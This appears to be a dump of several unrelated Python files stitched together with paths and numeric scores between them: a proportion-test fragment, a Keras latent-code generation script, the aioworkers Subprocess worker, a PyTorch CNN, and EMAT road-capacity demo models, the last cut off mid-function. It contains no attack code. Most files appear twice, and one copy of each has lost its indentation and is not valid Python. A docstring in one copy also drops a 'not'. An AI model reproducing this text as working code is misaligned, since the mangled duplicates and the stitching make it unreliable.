sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5 # always
LCL = p1-p2 - zcv*sd_p
UCL = p1-p2 + zcv*sd_p
conf_interval = [LCL, UCL]
result_dict['conf_interval'] = conf_interval
result = f"""======= Inf. Two Population Proportions =======
D = {D:.{precision}f}
p1 = {p1:.{precision}f}
p2 = {p2:.{precision}f}
""" + sub_result + f"""
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]"""
if show:
print(result)
return result_dict | 0.436622 | 0.471284 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import io
import sys
import glob
import argparse
from datetime import datetime
from collections import OrderedDict
import numpy as np
import pandas as pd
import scipy.io as sio
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras.models import model_from_json
from sklearn.linear_model import SGDClassifier
import matplotlib.pyplot as plt
from models import *
from utils import *
def generate(data, descriptors, dim, beta, encoder, decoder, classifier=True, visualize=False):
    """Generate latent space embeddings (or codes) for each model and given semantic descriptors.

    This function takes in the training data (or testing) along with a set of encoder and decoder models.
    We then use the Stochastic Gradient Descent algorithm in sci-kit learn in order to separate the two descriptors
    within the latent space. Using this line we draw a perpendicular line and move along that line in either direction,
    where each direction moves towards a code that is more heavily linked to the respective semantic descriptor.

    Our current method here for determining these codes is fairly clunky and not ideal.
    It does sometimes produce codes that are not extremely representative of their class,
    but overall it works well enough for the time being.

    Args:
        data (DataFrame) : Pandas dataframe with equalizer parameter data (normalized)
        descriptors (list) : List of the semantic descriptors as strings
        dim (int) : Latent dimensions of the autoencoder model
        beta (float) : Disentanglement factor for the supplied models
        encoder (model) : Trained encoder Keras model
        decoder (model) : trained decoder Keras model
        classifier (bool) : Use a linear classifier, otherwise randomally sample data
        visualize (bool) : Create scatter plots of data and generated embeddings

    Returns:
        OrderedDict: Mapping of "{dim}d_{descriptor}{factor}" keys to latent codes.
    """
    # generate embeddings for data points
    # (a redundant second encoder.predict() call was removed here — its
    # result was never used and doubled the forward-pass cost)
    x = np.array(data.values[:, 1:])
    z_mean, _, _ = encoder.predict(x, batch_size=8)
    # NOTE(review): iterating set(descriptors) makes class indices
    # order-dependent on Python's set iteration — confirm this is intended.
    classes = OrderedDict({b: a for a, b in enumerate(set(descriptors))})
    labels = data['descriptor'].map(classes, na_action='ignore').values
    codes = OrderedDict({})
    for descriptor_class, descriptor_index in classes.items():
        class_samples = z_mean[np.where(labels == descriptor_index)[0]]
        if classifier:
            # create linear classifier separating the two descriptor classes
            clf = SGDClassifier()
            clf.fit(z_mean, labels)
            for factor in [0.5, 1, 2]:
                # Step off the decision boundary; flip direction if the
                # stepped point is not classified as this descriptor.
                code = -(clf.intercept_[0]/clf.coef_[0]) + factor
                if clf.predict([code]) != descriptor_index:
                    code = -(clf.intercept_[0]/clf.coef_[0]) - factor
                codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
                x = denormalize_params(decoder.predict(np.array([code])))[0]
                plot_filename = os.path.join("plots", "embeddings", f"{code}.png")
                plot_tf(x, plot_title=f"{dim}d_{descriptor_class}{factor+1}", to_file=plot_filename)
        else:
            # Fallback: draw random samples from this class's embeddings.
            for factor in np.arange(0, 3):
                code_idx = np.random.choice(class_samples.shape[0])
                code = class_samples[code_idx, :]
                codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
                print(code)
    if visualize:
        colors = ["#444e86", "#ff6e54", "#dd5182", "#955196"]
        if dim == 1:
            fig, ax = plt.subplots(figsize=(12, 10))
        elif dim == 2:
            fig, ax = plt.subplots(figsize=(12, 10))
        else:
            fig = plt.figure(figsize=(12, 10))
            ax = fig.add_subplot(111, projection='3d')
        # Scatter the raw class embeddings, one color per descriptor.
        for descriptor_class, descriptor_index in classes.items():
            class_samples = z_mean[np.where(labels == descriptor_index)[0]]
            if dim == 3:
                scatter = ax.scatter(class_samples[:, 0], class_samples[:, 1], class_samples[:, 2],
                                     c=colors[descriptor_index], label=descriptor_class)
            elif dim == 2:
                scatter = ax.scatter(class_samples[:, 0], class_samples[:, 1],
                                     c=colors[descriptor_index], label=descriptor_class)
            else:
                # 1-D: spread classes vertically so they don't overlap.
                scatter = ax.scatter(class_samples[:, 0], (np.ones(class_samples[:, 0].shape) * descriptor_index)/4,
                                     c=colors[descriptor_index], label=descriptor_class)
        # Overlay the generated codes in the remaining palette colors.
        for idx, (descriptor_class, code) in enumerate(codes.items()):
            if idx < 3:
                c_offset = 0
            else:
                c_offset = 1
            if dim == 3:
                scatter = ax.scatter(code[0], code[1], code[2],
                                     c=colors[2+c_offset], label=descriptor_class)
            elif dim == 2:
                scatter = ax.scatter(code[0], code[1],
                                     c=colors[2+c_offset], label=descriptor_class)
            else:
                scatter = ax.scatter(code[0], 0,
                                     c=colors[2+c_offset], label=descriptor_class)
        plt.show()
    return codes
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Generate average latent codes for semantic descriptors.')
    parser.add_argument('modeldir', type=str, help='path directory containing all model files')
    parser.add_argument('--output', type=str, help='path to output directory for mat file')
    args = parser.parse_args()

    # load normalized data from file
    eq_params = pd.read_csv("../data/safe/normalized_eq_params.csv", sep=",", index_col=0)
    count = pd.read_csv("../data/safe/descriptors.csv", sep=",", index_col=0)

    # only use data points within the top 2 occuring descriptors
    descriptors = count.loc[0:1, 'descriptor'].tolist()
    eq_df = eq_params[eq_params['descriptor'].isin(descriptors)]

    # get models (sorted so encoder/decoder pairs line up)
    encoder_models = glob.glob(os.path.join(args.modeldir, 'encoders', "*.h5"))
    decoder_models = glob.glob(os.path.join(args.modeldir, 'decoders', "*.h5"))

    # codes array: 3 latent dims x 4 beta settings x 6 codes x 3 components
    codes = np.empty([3, 4, 6, 3])

    for encoder_model, decoder_model in zip(sorted(encoder_models), sorted(decoder_models)):
        encoder_w = encoder_model
        encoder_a = encoder_model.replace('.h5', '.json')
        # model reconstruction from JSON file
        with open(encoder_a, 'r') as f:
            encoder = model_from_json(f.read())
        # load weights into the new model
        encoder.load_weights(encoder_w)

        decoder_w = decoder_model
        decoder_a = decoder_model.replace('.h5', '.json')
        # model reconstruction from JSON file
        with open(decoder_a, 'r') as f:
            decoder = model_from_json(f.read())
        # load weights into the new model
        decoder.load_weights(decoder_w)

        # Parse dim and beta_max out of fixed filename positions.
        # NOTE(review): fragile — assumes an exact filename layout.
        dim = int(os.path.basename(encoder_w)[7])
        beta_max = float(os.path.basename(encoder_w)[15:20])
        if np.isclose(beta_max, 0.02):
            beta = 4
        elif np.isclose(beta_max, 0.01):
            beta = 3
        elif np.isclose(beta_max, 0.001):
            beta = 2
        elif np.isclose(beta_max, 0.000):
            beta = 1
        else:
            # Previously `beta` stayed unbound here and crashed later with
            # a confusing NameError (or silently reused the prior value).
            raise ValueError(f"unrecognized beta_max {beta_max} in {encoder_w}")

        c = generate(eq_df, descriptors, dim, beta, encoder, decoder)
        for idx, (key, val) in enumerate(c.items()):
            # Zero-pad codes with fewer than 3 latent components.
            code = np.zeros(3)
            code[:val.shape[0]] = val
            print(dim, beta, idx, code)
            codes[dim-1][beta-1][idx] = code

    # check if directory exists
    if not os.path.isdir(os.path.join('..', 'plugin', 'assets')):
        os.makedirs(os.path.join('..', 'plugin', 'assets'))

    # save the final array into a mat file in the plugin assets directory
    # (removed dataset-extraction residue fused onto this line)
    sio.savemat(os.path.join('..', 'plugin', 'assets', 'codes.mat'), {'codes': codes})
from __future__ import division
from __future__ import print_function
import os
import io
import sys
import glob
import argparse
from datetime import datetime
from collections import OrderedDict
import numpy as np
import pandas as pd
import scipy.io as sio
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras.models import model_from_json
from sklearn.linear_model import SGDClassifier
import matplotlib.pyplot as plt
from models import *
from utils import *
def generate(data, descriptors, dim, beta, encoder, decoder, classifier=True, visualize=False):
"""Generate latent space embeddings (or codes) for each model and given semantic descriptors.
This function takes in the training data (or testing) along with a set of encoder and decoder models.
We then use the Stochastic Gradient Descent algorithm in sci-kit learn in order to separate the two descriptors
within the latent space. Using this line we draw a perpendicular line and move along that line in either direction,
where each direction moves towards a code that is more heavily linked to the respective semantic descriptor.
Our current method here for determining these codes is fairly clunky and ideal.
It does sometimes produce codes that are not extremely representative of their class,
but overall it works well enough for the time being.
Args:
data (DataFrame) : Pandas dataframe with equalizer parameter data (normalized)
descriptors (list) : List of the semantic descriptors as strings
dim (int) : Latent dimensions of the autoencoder model
beta (float) : Disentanglement factor for the supplied models
encoder (model) : Trained encoder Keras model
decoder (model) : trained decoder Keras model
classifier (bool) : Use a linear classifier, otherwise randomally sample data
visualize (bool) : Create scatter plots of data and generated embeddings
"""
# generate embeddings for data points
x = np.array(data.values[:,1:])
a = encoder.predict(x, batch_size=8)
z_mean, _, _ = encoder.predict(x, batch_size=8)
classes = OrderedDict({b: a for a, b in enumerate(set(descriptors))})
labels = data['descriptor'].map(classes, na_action='ignore').values
codes = OrderedDict({})
for descriptor_class, descriptor_index in classes.items():
class_samples = z_mean[np.where(labels == descriptor_index)[0]]
if classifier:
# create linear classifier
clf = SGDClassifier()
clf.fit(z_mean, labels)
for factor in [0.5, 1, 2]:
code = -(clf.intercept_[0]/clf.coef_[0]) + factor
if clf.predict([code]) != descriptor_index:
code = -(clf.intercept_[0]/clf.coef_[0]) - factor
codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
x = denormalize_params(decoder.predict(np.array([code])))[0]
plot_filename = os.path.join("plots", "embeddings", f"{code}.png")
#print(plot_filename)
plot_tf(x, plot_title=f"{dim}d_{descriptor_class}{factor+1}", to_file=plot_filename)
else:
for factor in np.arange(0,3):
code_idx = np.random.choice(class_samples.shape[0])
code = class_samples[code_idx,:]
codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
print(code)
if visualize:
colors = ["#444e86", "#ff6e54", "#dd5182", "#955196"]
if dim == 1:
fig, ax = plt.subplots(figsize=(12, 10))
elif dim == 2:
fig, ax = plt.subplots(figsize=(12, 10))
else:
fig = plt.figure(figsize=(12, 10))
ax = fig.add_subplot(111, projection='3d')
for descriptor_class, descriptor_index in classes.items():
class_samples = z_mean[np.where(labels == descriptor_index)[0]]
if dim == 3:
scatter = ax.scatter(class_samples[:,0], class_samples[:,1], class_samples[:,2],
c=colors[descriptor_index], label=descriptor_class)
elif dim == 2:
scatter = ax.scatter(class_samples[:,0], class_samples[:,1],
c=colors[descriptor_index], label=descriptor_class)
else:
scatter = ax.scatter(class_samples[:,0], (np.ones(class_samples[:,0].shape) * descriptor_index)/4,
c=colors[descriptor_index], label=descriptor_class)
for idx, (descriptor_class, code) in enumerate(codes.items()):
if idx < 3:
c_offset = 0
else:
c_offset = 1
if dim == 3:
scatter = ax.scatter(code[0], code[1], code[2],
c=colors[2+c_offset], label=descriptor_class)
elif dim == 2:
scatter = ax.scatter(code[0], code[1],
c=colors[2+c_offset], label=descriptor_class)
else:
scatter = ax.scatter(code[0], 0,
c=colors[2+c_offset], label=descriptor_class)
plt.show()
return codes
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate average latent codes for semantic descriptors.')
parser.add_argument('modeldir', type=str, help='path directory containing all model files')
parser.add_argument('--output', type=str, help='path to output directory for mat file')
args = parser.parse_args()
# load normalized data from file
eq_params = pd.read_csv("../data/safe/normalized_eq_params.csv", sep=",", index_col=0)
count = pd.read_csv("../data/safe/descriptors.csv", sep=",", index_col=0)
# only use data points within the top 2 occuring descriptors
descriptors = count.loc[0:1, 'descriptor'].tolist()
eq_df = eq_params[eq_params['descriptor'].isin(descriptors)]
# get models
encoder_models = glob.glob(os.path.join(args.modeldir, 'encoders', "*.h5"))
decoder_models = glob.glob(os.path.join(args.modeldir, 'decoders', "*.h5"))
# codes dictionary
codes = np.empty([3,4,6,3])
for encoder_model, decoder_model in zip(sorted(encoder_models), sorted(decoder_models)):
encoder_w = encoder_model
encoder_a = encoder_model.replace('.h5', '.json')
# model reconstruction from JSON file
with open(encoder_a, 'r') as f:
encoder = model_from_json(f.read())
# load weights into the new model
encoder.load_weights(encoder_w)
decoder_w = decoder_model
decoder_a = decoder_model.replace('.h5', '.json')
# model reconstruction from JSON file
with open(decoder_a, 'r') as f:
decoder = model_from_json(f.read())
# load weights into the new model
decoder.load_weights(decoder_w)
dim = int(os.path.basename(encoder_w)[7])
beta_max = float(os.path.basename(encoder_w)[15:20])
if np.isclose(beta_max, 0.02):
beta = 4
elif np.isclose(beta_max, 0.01):
beta = 3
elif np.isclose(beta_max, 0.001):
beta = 2
elif np.isclose(beta_max, 0.000):
beta = 1
c = generate(eq_df, descriptors, dim, beta, encoder, decoder)
for idx, (key, val) in enumerate(c.items()):
code = np.zeros(3)
code[:val.shape[0]] = val
print(dim, beta, idx, code)
codes[dim-1][beta-1][idx] = code
# check if directory exists
if not os.path.isdir(os.path.join('..','plugin','assets')):
os.makedirs(os.path.join('..','plugin','assets'))
# save the final array into a mat file in the plugin assets directory
sio.savemat(os.path.join('..','plugin','assets', 'codes.mat'), {'codes' : codes}) | 0.718594 | 0.425725 |
import asyncio
import shlex
import subprocess
import sys
import weakref
from typing import Mapping, Sequence
from .. import utils
from ..core.formatter import FormattedEntity
from .base import Worker
class Subprocess(FormattedEntity, Worker):
"""
config:
cmd: str - shell command with mask python format
list[str] - exec command with mask python format
aioworkers: argv or str for aioworkers subprocess
stdin: [none | PIPE | DEVNULL]
stdout: [none | PIPE | DEVNULL]
stderr: [none | PIPE | STDOUT | DEVNULL]
wait: bool - default True for wait shutdown process
params: dict of params
daemon: true
format: [json|str|bytes]
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._processes = weakref.WeakValueDictionary()
self._cmd = ''
self._shell = False
self._config_stdin = False
self._wait = True
self._daemon = False
self._keeper = None
self.params = {}
async def init(self):
if self.config.get('stdin'):
stdin = getattr(subprocess, self.config.get('stdin'))
elif 'stdin' in self.config:
stdin = None
else:
stdin = subprocess.PIPE
if self.config.get('stdout'):
stdout = getattr(subprocess, self.config.get('stdout'))
elif 'stdout' in self.config:
stdout = None
else:
stdout = subprocess.PIPE
if self.config.get('stderr'):
stderr = getattr(subprocess, self.config.get('stderr'))
else:
stderr = None
self._wait = self.config.get('wait', True)
self._config_stdin = False
if 'aioworkers' in self.config:
cmd = ['{python}', '-m', 'aioworkers', '--config-stdin']
value = self.config['aioworkers']
if isinstance(value, str):
cmd.append(value)
cmd = ' '.join(cmd)
elif isinstance(value, list):
cmd.extend(value)
else:
raise TypeError(value)
stdin = subprocess.PIPE
self._config_stdin = True
elif 'cmd' in self.config:
cmd = self.config['cmd']
else:
raise ValueError
self._cmd = cmd
self._shell = self.config.get('shell', isinstance(cmd, str))
if self._shell:
coro = asyncio.create_subprocess_shell
else:
coro = asyncio.create_subprocess_exec
self.create_subprocess = lambda *args: coro(
*args, stdin=stdin, stdout=stdout,
stderr=stderr, loop=self.loop)
self.params = dict(self.config.get('params', ()))
self.params.setdefault('python', sys.executable)
self.params.setdefault('config', self.config)
self.params.setdefault('worker', self)
self._daemon = self.config.get('daemon')
self._keeper = None
if self._daemon:
self._wait = False
self._event = asyncio.Event(loop=self.loop)
self._event.clear()
await super().init()
@property
def process(self):
for p in self._processes.values():
if p.returncode is None:
return p
def make_command(self, value):
cmd = self._cmd
args = ()
m = dict(self.params)
if isinstance(value, Mapping):
m.update(value)
elif isinstance(value, Sequence):
args = value
elif isinstance(value, str):
args = value,
is_cmd_str = isinstance(cmd, str)
if is_cmd_str:
cmd = cmd.format_map(m)
else:
cmd = [part.format_map(m) for part in cmd]
cmd.extend(args)
if self._shell and not is_cmd_str:
cmd = ' '.join(cmd)
elif not self._shell and is_cmd_str:
cmd = shlex.split(cmd)
if isinstance(cmd, str):
cmd = cmd,
return cmd
async def run_cmd(self, *args, **kwargs):
if len(args) > 1:
value = args
elif args:
value = args[0]
elif kwargs:
value = kwargs
else:
value = None
cmd = self.make_command(value)
self.logger.info(' '.join(cmd))
process = await self.create_subprocess(*cmd)
self._processes[process.pid] = process
if self._config_stdin:
utils.dump_to_fd(process.stdin, self.context.config)
await process.stdin.drain()
if self._wait:
await process.wait()
else:
return process
if not self._daemon and process.stdout is not None:
data = await process.stdout.read()
return self.decode(data)
async def work(self):
if self._daemon:
await self._event.wait()
return await super().work()
async def _keep_daemon(self):
while True:
try:
process = await self.run_cmd()
self._event.set()
await process.wait()
finally:
self._event.clear()
await asyncio.sleep(1)
async def start(self):
if self._daemon:
self._keeper = self.loop.create_task(self._keep_daemon())
return await super().start()
async def stop(self, force=True):
if self._keeper is not None:
self._keeper.cancel()
self._event.clear()
try:
await self._keeper
except asyncio.CancelledError:
pass
self._keeper = None
for process in self._processes.values():
try:
if process.returncode is not None:
continue
elif force:
process.kill()
else:
process.terminate()
await process.wait()
except ProcessLookupError:
pass
await super().stop(force=force) | aioworkers/worker/subprocess.py | import asyncio
import shlex
import subprocess
import sys
import weakref
from typing import Mapping, Sequence
from .. import utils
from ..core.formatter import FormattedEntity
from .base import Worker
class Subprocess(FormattedEntity, Worker):
"""
config:
cmd: str - shell command with mask python format
list[str] - exec command with mask python format
aioworkers: argv or str for aioworkers subprocess
stdin: [none | PIPE | DEVNULL]
stdout: [none | PIPE | DEVNULL]
stderr: [none | PIPE | STDOUT | DEVNULL]
wait: bool - default True for wait shutdown process
params: dict of params
daemon: true
format: [json|str|bytes]
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._processes = weakref.WeakValueDictionary()
self._cmd = ''
self._shell = False
self._config_stdin = False
self._wait = True
self._daemon = False
self._keeper = None
self.params = {}
async def init(self):
if self.config.get('stdin'):
stdin = getattr(subprocess, self.config.get('stdin'))
elif 'stdin' in self.config:
stdin = None
else:
stdin = subprocess.PIPE
if self.config.get('stdout'):
stdout = getattr(subprocess, self.config.get('stdout'))
elif 'stdout' in self.config:
stdout = None
else:
stdout = subprocess.PIPE
if self.config.get('stderr'):
stderr = getattr(subprocess, self.config.get('stderr'))
else:
stderr = None
self._wait = self.config.get('wait', True)
self._config_stdin = False
if 'aioworkers' in self.config:
cmd = ['{python}', '-m', 'aioworkers', '--config-stdin']
value = self.config['aioworkers']
if isinstance(value, str):
cmd.append(value)
cmd = ' '.join(cmd)
elif isinstance(value, list):
cmd.extend(value)
else:
raise TypeError(value)
stdin = subprocess.PIPE
self._config_stdin = True
elif 'cmd' in self.config:
cmd = self.config['cmd']
else:
raise ValueError
self._cmd = cmd
self._shell = self.config.get('shell', isinstance(cmd, str))
if self._shell:
coro = asyncio.create_subprocess_shell
else:
coro = asyncio.create_subprocess_exec
self.create_subprocess = lambda *args: coro(
*args, stdin=stdin, stdout=stdout,
stderr=stderr, loop=self.loop)
self.params = dict(self.config.get('params', ()))
self.params.setdefault('python', sys.executable)
self.params.setdefault('config', self.config)
self.params.setdefault('worker', self)
self._daemon = self.config.get('daemon')
self._keeper = None
if self._daemon:
self._wait = False
self._event = asyncio.Event(loop=self.loop)
self._event.clear()
await super().init()
@property
def process(self):
for p in self._processes.values():
if p.returncode is None:
return p
def make_command(self, value):
cmd = self._cmd
args = ()
m = dict(self.params)
if isinstance(value, Mapping):
m.update(value)
elif isinstance(value, Sequence):
args = value
elif isinstance(value, str):
args = value,
is_cmd_str = isinstance(cmd, str)
if is_cmd_str:
cmd = cmd.format_map(m)
else:
cmd = [part.format_map(m) for part in cmd]
cmd.extend(args)
if self._shell and not is_cmd_str:
cmd = ' '.join(cmd)
elif not self._shell and is_cmd_str:
cmd = shlex.split(cmd)
if isinstance(cmd, str):
cmd = cmd,
return cmd
async def run_cmd(self, *args, **kwargs):
if len(args) > 1:
value = args
elif args:
value = args[0]
elif kwargs:
value = kwargs
else:
value = None
cmd = self.make_command(value)
self.logger.info(' '.join(cmd))
process = await self.create_subprocess(*cmd)
self._processes[process.pid] = process
if self._config_stdin:
utils.dump_to_fd(process.stdin, self.context.config)
await process.stdin.drain()
if self._wait:
await process.wait()
else:
return process
if not self._daemon and process.stdout is not None:
data = await process.stdout.read()
return self.decode(data)
async def work(self):
if self._daemon:
await self._event.wait()
return await super().work()
async def _keep_daemon(self):
while True:
try:
process = await self.run_cmd()
self._event.set()
await process.wait()
finally:
self._event.clear()
await asyncio.sleep(1)
async def start(self):
if self._daemon:
self._keeper = self.loop.create_task(self._keep_daemon())
return await super().start()
async def stop(self, force=True):
if self._keeper is not None:
self._keeper.cancel()
self._event.clear()
try:
await self._keeper
except asyncio.CancelledError:
pass
self._keeper = None
for process in self._processes.values():
try:
if process.returncode is not None:
continue
elif force:
process.kill()
else:
process.terminate()
await process.wait()
except ProcessLookupError:
pass
await super().stop(force=force) | 0.359252 | 0.074064 |
import torch
from torch import nn
class Model(nn.Module):
def __init__(self):
super().__init__()
self._conv_part = nn.Sequential(
nn.Conv2d(3, 6, 5, padding=2),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Conv2d(6, 16, 5),
nn.ReLU(),
nn.MaxPool2d(2),
)
self._fc_part = nn.Sequential(
nn.Linear(16*5*5, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU()
)
self._pred_part = nn.Sequential(
nn.Linear(64, 64),
nn.Tanh()
)
self._loss = nn.BCEWithLogitsLoss()
def get_repr(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
return fc_in.view(n_batch, n_ex, 64).sum(dim=1)
def forward(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
label_out = batch.label_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
label_out = label_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
predictor = self._pred_part(fc_in.view(n_batch, n_ex, 64).sum(dim=1))
conv_out = self._conv_part(feats_out)
rep_out = self._fc_part(conv_out.view(n_batch, 16*5*5))
score = (predictor * rep_out).sum(dim=1)
labels = (score > 0).float()
loss = self._loss(score, label_out)
return loss, (labels == label_out).float().mean(), labels, predictor | model.py | import torch
from torch import nn
class Model(nn.Module):
def __init__(self):
super().__init__()
self._conv_part = nn.Sequential(
nn.Conv2d(3, 6, 5, padding=2),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Conv2d(6, 16, 5),
nn.ReLU(),
nn.MaxPool2d(2),
)
self._fc_part = nn.Sequential(
nn.Linear(16*5*5, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU()
)
self._pred_part = nn.Sequential(
nn.Linear(64, 64),
nn.Tanh()
)
self._loss = nn.BCEWithLogitsLoss()
def get_repr(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
return fc_in.view(n_batch, n_ex, 64).sum(dim=1)
def forward(self, batch):
feats_in = batch.feats_in
feats_out = batch.feats_out
label_out = batch.label_out
if next(self.parameters()).is_cuda:
feats_in = feats_in.cuda()
feats_out = feats_out.cuda()
label_out = label_out.cuda()
n_batch, n_ex, c, w, h = feats_in.shape
conv_in = self._conv_part(feats_in.view(n_batch * n_ex, c, w, h))
fc_in = self._fc_part(conv_in.view(n_batch * n_ex, 16*5*5))
predictor = self._pred_part(fc_in.view(n_batch, n_ex, 64).sum(dim=1))
conv_out = self._conv_part(feats_out)
rep_out = self._fc_part(conv_out.view(n_batch, 16*5*5))
score = (predictor * rep_out).sum(dim=1)
labels = (score > 0).float()
loss = self._loss(score, label_out)
return loss, (labels == label_out).float().mean(), labels, predictor | 0.939102 | 0.416441 |
import numpy
class Dummy():
def __init__(self):
'''nothing to do here'''
def calc_pm1(self, exp_vars):
return self.__sum_exp_vars(exp_vars)
def calc_pm2(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 2
def calc_pm10(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 10
def calc_pm100(self, exp_vars):
return self.__sum_exp_vars(exp_vars) * 100
def __sum_exp_vars(self,ev):
return ev['exp_var 1'] + ev['exp_var 2']
def __call__(self, **kwargs):
return dict(
pm_1=self.calc_pm1(kwargs),
pm_2=self.calc_pm2(kwargs),
pm_10=self.calc_pm10(kwargs),
pm_100=self.calc_pm100(kwargs),
)
def NoisyDummy(**kwargs):
lever1 = kwargs.get('lever1', 0)
lever2 = kwargs.get('lever2', 0)
uncertain1 = kwargs.get('uncertain1', 3)
uncertain2 = numpy.exp(kwargs.get('uncertain2', -0.7))
uncertain3 = numpy.exp(kwargs.get('uncertain3', 0.7))
certain4 = kwargs.get('certain4', 3)
noise_amplitude = kwargs.get('noise_amplitude', 2.0)
noise_frequency = kwargs.get('noise_frequency', 5.0)
pm_1 = (
- uncertain2 * lever1 * lever1
+ (uncertain1 + certain4) * (lever1 + lever2)
+ noise_amplitude * numpy.sin(noise_frequency * lever1)
)
pm_2 = numpy.minimum(
1.11e+111 * uncertain1,
numpy.exp(
uncertain3 * lever1 * (lever1 + lever2)
+ uncertain1 * lever1
+ noise_amplitude * numpy.cos(noise_frequency * lever2)
)
)
pm_3 = (
noise_amplitude * numpy.cos(noise_frequency * lever1)
+ noise_amplitude * numpy.sin(noise_frequency * lever2)
+ certain4
)
pm_4 = numpy.exp(
uncertain1 + certain4
)
return {'pm_1':pm_1, 'pm_2': pm_2, 'pm_3': pm_3, 'pm_4':pm_4}
def Road_Capacity_Investment(
# constant
free_flow_time=60,
initial_capacity=100,
# uncertainty
alpha=0.15,
beta=4.0,
input_flow=100,
value_of_time=0.01,
unit_cost_expansion=1,
interest_rate=0.03,
yield_curve=0.01,
# policy
expand_capacity=10,
amortization_period=30,
interest_rate_lock=False,
debt_type='GO Bond',
lane_width=10,
**kwargs,
):
"""
A fictitious example model for road capacity investment.
This model simulates a capacity expansion investment on a single
network link. The link volume-delay function is governed by the
`BPR function <https://en.wikipedia.org/wiki/Route_assignment#Frank-Wolfe_algorithm>`_.
This model is a bit contrived, because it is designed to explicitly demonstrate
a wide variety of EMAT features in a transportation planning model that is as simple
as possible. For example, the policy levers are structured so that there is one
of each dtype (float, int, bool, and categorical).
Args:
free_flow_time (float, default 60): The free flow travel time on the link.
initial_capacity (float, default 100): The pre-expansion capacity on the link.
alpha (float, default 0.15): Alpha parameter to the BPR volume-delay function.
beta (float, default 4.0): Beta parameter to the BPR volume-delay function.
input_flow (float, default 100): The future input flow on the link.
value_of_time (float, default 0.01): The value of a unit of travel time savings
per unit of flow on the link.
unit_cost_expansion (float, default 1): The present marginal cost of adding one
unit of capacity to the link (assumes no economies of scale on expansion cost)
interest_rate (float, default 0.03): The interest rate actually incurred for
revenue bonds amortized over 15 years. The interest rate for general obligation
bonds is assumed to be 0.0025 less than this value.
yield_curve (float, default 0.01): The marginal increase in the interest_rate if
the amortization period is 50 years instead of 15. The yield curve is assumed
to be linearly projected to all other possible amortization periods
expand_capacity (float, default 10): The amount of capacity expansion actually
constructed.
amortization_period (int, default 30): The time period over which the construction
costs are amortized.
interest_rate_lock (bool, default False): Whether interest rates are locked at
the assumed current rate of 0.03 / 0.01 or allowed to float.
debt_type ('GO Bond', 'Rev Bond', 'Paygo'): Type of financing. General obligation
bonds are assumed to have a lower interest rate than revenue bonds, but
may be politically less desirable. Pay-as-you-go financing incurs no actual
interest costs, but requires actually having the funds available.
lane_width (float, default 10): The width of lanes on the roadway. This parameter
is intentionally wacky, causing massive congestion for any value other than 10,
to demonstrate what might happen with broken model inputs.
Returns:
dict:
no_build_travel_time
The average travel time on the link if no
capacity expansion was constructed.
build_travel_time
The average travel time on the link after expansion.
time_savings
The average travel time savings as a result of the
expansion.
value_of_time_savings
The total value of the travel time savings,
accounting for the time savings per traveler, the total flow, and
the value of time.
present_cost_expansion
The present cost of building the expansion
cost_of_capacity_expansion
The annual payment to finance the expansion,
when amortized.
net_benefits
The value of the time savings minus the annual payment.
"""
debt_type = debt_type.lower()
assert debt_type in ('go bond', 'paygo', 'rev bond')
average_travel_time0 = free_flow_time * (1 + alpha*(input_flow/initial_capacity)**beta)
capacity = initial_capacity + expand_capacity
average_travel_time1 = free_flow_time * (1 + alpha*(input_flow/capacity)**beta)
average_travel_time1 += (numpy.absolute(lane_width-10)*1000)**0.5
travel_time_savings = average_travel_time0 - average_travel_time1
value_of_time_savings = value_of_time * travel_time_savings * input_flow
present_cost_of_capacity_expansion = float(unit_cost_expansion * expand_capacity)
if interest_rate_lock:
interest_rate = 0.03
yield_curve = 0.01
if (debt_type == 'go bond'):
interest_rate -= 0.0025
elif (debt_type == 'paygo'):
interest_rate = 0
effective_interest_rate = interest_rate + yield_curve * (amortization_period-15) / 35
cost_of_capacity_expansion = numpy.pmt(effective_interest_rate,
amortization_period,
present_cost_of_capacity_expansion, )
return dict(
no_build_travel_time=average_travel_time0,
build_travel_time=average_travel_time1,
time_savings=travel_time_savings,
value_of_time_savings=value_of_time_savings,
present_cost_expansion=present_cost_of_capacity_expansion,
cost_of_capacity_expansion=-cost_of_capacity_expansion,
net_benefits = value_of_time_savings + cost_of_capacity_expansion,
)
def _Road_Capacity_Investment_CmdLine():
"""
This is a demo for calling a core model function on the command line.
"""
import argparse, pandas, os, numpy, sys, warnings
parser = argparse.ArgumentParser()
parser.add_argument('--levers', type=str, default='levers.yml', help='Levers Yaml File')
